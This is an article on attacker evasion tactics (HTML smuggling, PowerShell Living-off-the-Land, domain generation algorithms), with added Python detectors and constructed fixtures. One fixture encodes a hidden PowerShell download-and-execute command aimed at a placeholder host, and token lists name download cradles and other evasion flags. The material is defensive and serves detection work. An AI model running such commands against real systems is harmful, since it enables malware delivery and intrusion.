Evasion Tactics: How Hackers Trick Our Security Solutions

As cybercriminals become more resourceful, traditional security solutions face mounting challenges. Attackers have developed highly sophisticated methods to bypass detection systems and infiltrate networks, leaving businesses vulnerable to silent, undetected breaches.

These methods, known as evasion tactics, exploit weaknesses in conventional security systems, allowing hackers to operate within company networks for extended periods without detection. With increased cyber threats, it’s crucial to understand how these tactics work and how organisations can protect themselves from these invisible threats.

Three of the most effective and increasingly common evasion techniques have emerged as significant threats: HTML smuggling, Living-off-the-Land (LotL) attacks, and domain generation algorithms (DGAs). Understanding these methods, and the strategies for defending against them, is crucial for maintaining robust security as cyber risks evolve.

The rise of HTML smuggling into seemingly harmless files or emails

HTML smuggling has emerged as one of the more dangerous forms of attack in recent years due to its ability to bypass traditional security defences. This method involves embedding malicious code, often JavaScript, into seemingly innocent HTML files or email attachments. The malicious payload is delivered to users under the guise of a legitimate file or email, tricking them into unknowingly executing the harmful code.

An example of this technique is when attackers send HTML files as email attachments that contain hidden JavaScript. When the recipient opens the file, the script runs in the background, often generating a phishing page designed to capture sensitive information such as login credentials. What makes HTML smuggling particularly dangerous is that the malicious code is executed within the user’s browser, bypassing email filters, antivirus programs, and even network firewalls.

Consider a scenario where an employee receives an email that appears to be from a trusted source, with an attachment labelled as an invoice or report. Upon opening the file, they are redirected to a fake login page for a popular online service, such as Microsoft 365 or Google. Because the page looks legitimate, the employee might unknowingly enter their login details, which are immediately transmitted to the attackers.

This approach highlights one of the most concerning aspects of HTML smuggling: it exploits human trust. Attackers disguise their payloads in a manner that convinces the user the content is safe, thus bypassing traditional security measures. In this way, HTML smuggling not only exploits the limitations of current security technologies but also preys on the human element of cybersecurity. To mitigate this risk, organisations must implement more sophisticated email filtering systems and ensure that employees are educated about the dangers of opening unexpected or suspicious attachments.
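An added Python example (not code from the article or from Cato Networks) showing how an email gateway or sandbox could score an HTML attachment for the client-side payload assembly described above: it extracts the script content and weights the indicators found in it. The indicator weights, the threshold and both sample attachments are constructed for this illustration.

```python
import re
from html.parser import HTMLParser

# Indicators of a payload being assembled client-side; the weights are an assumption.
INDICATORS = {
    r"atob\s*\(": 3,                   # base64-decoding an embedded blob
    r"new\s+Blob\s*\(": 3,             # building a file inside the browser
    r"createObjectURL\s*\(": 2,        # turning that file into a downloadable URL
    r"\.download\s*=": 2,              # forcing a download with a chosen file name
    r"\.click\s*\(\)": 1,              # triggering it without a user click
    r"[A-Za-z0-9+/]{200,}={0,2}": 3,   # a long base64 literal carried in the page
}

class ScriptExtractor(HTMLParser):
    """Collect the text of every <script> element so only code is scored."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def score_html(html):
    """Return (score, matched patterns) for one HTML attachment."""
    parser = ScriptExtractor()
    parser.feed(html)
    parser.close()
    code = "\n".join(parser.scripts)
    hits = [pat for pat in INDICATORS if re.search(pat, code)]
    return sum(INDICATORS[p] for p in hits), hits

def is_suspicious(html, threshold=5):
    return score_html(html)[0] >= threshold

# Constructed fixtures (not real attachments); the base64 decodes to the words "placeholder text".
SMUGGLED = """<html><body><p>Invoice attached.</p><script>
var data = atob("cGxhY2Vob2xkZXIgdGV4dA==");
var blob = new Blob([data], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob); a.download = "sample.txt"; a.click();
</script></body></html>"""
BENIGN = """<html><body><h1>Report</h1><script>document.title = "Q3 report";</script></body></html>"""
```

Scoring only script content keeps plain-text mentions of these words in the page body from inflating the score.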

How attackers use LotL techniques to execute malware

LotL techniques represent another growing threat in the world of cyberattacks. Unlike traditional malware that relies on external software or payloads to breach a network, LotL attacks make use of legitimate system tools and processes already present in the target environment. By leveraging trusted applications and utilities, attackers can hide their activities, making them harder to detect by conventional security systems.

One of the most commonly exploited tools in LotL attacks is PowerShell, a legitimate command-line shell and scripting language native to Windows systems. PowerShell allows administrators to automate tasks and manage systems, but it can also be exploited by attackers to execute malicious scripts and download malware. Because PowerShell is a trusted system tool, many antivirus programs and intrusion detection systems (IDS) overlook its usage, especially if the commands appear to be part of normal operations.

For example, an attacker may send a phishing email that contains a malicious link. When the recipient clicks the link, a PowerShell script is executed in the background, downloading malware from a remote server and installing it on the victim’s system. Since no external files are involved, the attack goes undetected by signature-based detection systems that rely on identifying known malware files. Additionally, many LotL attacks leave no traces on the hard drive, operating entirely in system memory, making forensic analysis difficult.

The effectiveness of LotL attacks lies in their ability to blend in with regular system activities, reducing their chances of detection. To defend against these attacks, businesses should consider implementing behaviour-based detection systems that can monitor how system tools are being used. By identifying unusual or suspicious activity, such as the unexpected use of PowerShell commands or network traffic to suspicious domains, organisations can catch these attacks before they cause significant damage.
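An added Python example (not from the article) of the behaviour-based check suggested above: it inspects process-creation events for a shell launched by a mail or Office client, expands a base64 `-enc` argument so tokens hidden inside it can be inspected, and looks for download-cradle and hidden-window flags. The parent-process baseline, the token lists and both events are constructed assumptions, and the URL is a placeholder.

```python
import base64
import re

# Assumed baseline for this example: parents that rarely have a legitimate reason to launch a shell.
DOCUMENT_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "msedge.exe", "chrome.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
CRADLE_TOKENS = [r"downloadstring", r"downloadfile", r"invoke-webrequest", r"net\.webclient",
                 r"invoke-expression", r"\biex\b", r"frombase64string"]
QUIET_TOKENS = [r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noni\b", r"-e(xecutionpolicy|p)\s+bypass"]
ENCODED_ARG = re.compile(r"-e(ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded_command(cmdline):
    """Append the decoded '-enc' payload (base64 of UTF-16LE) so hidden tokens become visible."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def assess_event(evt):
    """Return the reasons one process-creation event looks like a LotL download, if any."""
    reasons = []
    image, parent = (evt[k].lower().rsplit("\\", 1)[-1] for k in ("image", "parent"))
    if image not in SHELLS:
        return reasons
    if parent in DOCUMENT_PARENTS:
        reasons.append(f"shell spawned by {parent}")
    expanded = expand_encoded_command(evt["cmdline"]).lower()
    if len(expanded) > len(evt["cmdline"]):
        reasons.append("encoded command")
    if any(re.search(t, expanded) for t in CRADLE_TOKENS):
        reasons.append("download cradle")
    if any(re.search(t, expanded) for t in QUIET_TOKENS):
        reasons.append("hidden window / no-profile flags")
    return reasons

def encode_ps(script):  # builds a PowerShell -enc argument; used only for the fixture below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process-creation events (not real telemetry); the URL is a placeholder.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/s')")},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
]
```

The decode step matters because a signature run only over the raw command line never sees the cradle inside an encoded argument.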

Why DGAs bypass IDS and IPS

DGAs represent another sophisticated technique used by cybercriminals to evade detection. DGA-based attacks are particularly effective at avoiding traditional Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) because they dynamically generate a large number of domain names, making it difficult to block malicious communications.

DGAs work by creating a seemingly random set of domain names that a piece of malware can use to communicate with its command-and-control (C2) server. These domain names can be generated daily, hourly, or even by the minute, allowing the malware to cycle through a list of domains until it successfully connects with the C2 server. Because the domains are constantly changing, it becomes nearly impossible for security teams to block them all in real time.

In a typical DGA-based attack, the malware might generate hundreds or even thousands of potential domain names in an attempt to contact its C2 server. This not only overwhelms security systems but also makes it difficult to distinguish between legitimate and malicious traffic. Even if security teams identify and block one domain, the malware can quickly switch to another domain generated by the algorithm.

Additionally, attackers often register only a small subset of these generated domains, making it even harder to predict which domain the malware will use for communication. This dynamic nature allows attackers to maintain control over their malware while evading detection by standard security measures like IDS and IPS.

To combat DGA-based attacks, organisations need to employ advanced threat intelligence solutions that can detect patterns in domain generation and identify malicious domains before they are activated. Machine learning algorithms are particularly effective in analysing network traffic to identify unusual domain activity, providing an additional layer of defence against these evasive techniques.
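An added Python example (not from the article) of the pattern detection described above: a lexical DGA-likeness score over the second-level label (entropy, vowel and digit ratios, consonant runs, length), plus a per-client check for the burst of distinct lookups that cycling through generated domains produces. The thresholds, the one-label-TLD assumption and the DNS log are constructed for this illustration.

```python
import math
from collections import Counter, defaultdict

VOWELS = set("aeiou")

def shannon_entropy(s):
    """Bits per character of a label; random-looking labels score higher."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def second_level_label(domain):
    """'abc' for 'www.abc.com'; assumes a one-label TLD (no public-suffix list here)."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]

def longest_consonant_run(s):
    run = best = 0
    for ch in s:
        run = run + 1 if ch.isalpha() and ch not in VOWELS else 0
        best = max(best, run)
    return best

def dga_score(domain):
    """Lexical DGA-likeness; thresholds are assumptions tuned on the fixture below."""
    label = second_level_label(domain)
    n = max(len(label), 1)
    score = 0
    if shannon_entropy(label) > 3.5: score += 2                  # near-uniform character mix
    if sum(ch in VOWELS for ch in label) / n < 0.2: score += 2   # unpronounceable
    if sum(ch.isdigit() for ch in label) / n > 0.15: score += 1  # digits sprinkled through
    if longest_consonant_run(label) >= 5: score += 2
    if len(label) >= 12: score += 1
    return score

def is_dga_like(domain, threshold=4):
    return dga_score(domain) >= threshold

def flag_clients(dns_log, min_hits=3):
    """Clients that resolved at least min_hits distinct DGA-like names in the log."""
    per_client = defaultdict(set)
    for client, domain in dns_log:
        if is_dga_like(domain):
            per_client[client].add(domain)
    return {c: sorted(names) for c, names in per_client.items() if len(names) >= min_hits}

# Constructed DNS query log (client, queried name); no real hosts or domains.
DNS_LOG = [("10.0.0.12", "example.com"), ("10.0.0.12", "intranet.example.org"),
           ("10.0.0.44", "xkq7vz2hplmw9tr.net"), ("10.0.0.44", "bnmlpqktrw.com"),
           ("10.0.0.44", "zq4wjvkxdnp8f.org"), ("10.0.0.44", "example.com")]
```

Combining the lexical score with the per-client burst keeps a single odd-looking but legitimate name from raising an alert on its own.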

How can organisations respond to attacks that use evasion tactics?

Advanced security measures that go beyond conventional solutions are required to protect companies against these attack methods. Traditional malware scanners and IDS are reaching their limits: they rely mainly on signature-based detection and are often unable to identify dynamic and obfuscated attacks. Instead, companies should rely on agentless systems that monitor and analyse all network traffic in real time.

Agentless systems have the advantage of not requiring additional software agents on end devices, which avoids degrading device performance and simplifies administration. By continuously monitoring network traffic, these systems can detect suspicious activity and anomalies that indicate potential threats. For example, sudden communication with a large number of newly registered domains, as occurs in DGA-based attacks, can be immediately identified and blocked.

Behaviour-based analytics play a critical role in detecting HTML smuggling and fileless malware that evade traditional detection methods. Agentless systems can detect conspicuous behaviour patterns, such as unusual PowerShell activity or the loading of HTML files containing JavaScript code, and take appropriate action before damage occurs. By detecting anomalies in network traffic, low-and-slow attacks that deliberately stay beneath IDS thresholds can also be identified at an early stage.

Homograph attacks and HTTPS-encrypted phishing pages require in-depth URL and content analysis. Agentless systems detect subtle differences in URLs and analyse encrypted traffic to expose phishing sites despite encryption. By combining these techniques, organisations can build a robust line of defence against the diverse and increasingly sophisticated threats.

Staying ahead of attackers

Evasion tactics, such as HTML smuggling, LotL techniques, and DGAs, represent some of the most dangerous threats in today’s cybersecurity landscape. These methods allow attackers to bypass traditional security defences, making it increasingly difficult for organisations to detect and respond to cyberattacks in a timely manner.

As cybercriminals continue to refine their methods, it is crucial for businesses to adopt more advanced security strategies. Relying solely on signature-based detection systems or traditional firewalls is no longer sufficient. Instead, organisations must invest in behaviour-based analysis, machine learning technologies, and advanced threat intelligence solutions that can detect anomalies in system activity and network traffic.

Adopting a Secure Access Service Edge (SASE) framework can help organisations secure their network and infrastructure. By integrating these security functions with network access in a single platform, SASE provides comprehensive protection that adapts to attackers’ evolving tactics, making it a strong choice for organisations looking to reduce the risks associated with advanced evasion techniques.

Additionally, employee training remains a critical component of any cybersecurity strategy. Since many evasion tactics, such as HTML smuggling, exploit human trust, educating employees about the dangers of phishing emails and suspicious attachments can significantly reduce the risk of successful attacks.

Staying ahead of attackers demands a multi-layered security approach. By understanding the tactics employed by cybercriminals and strengthening defences, businesses can enhance their protection against the increasing threat of evasion techniques.

Etay Maor, Chief Security Strategist at Cato Networks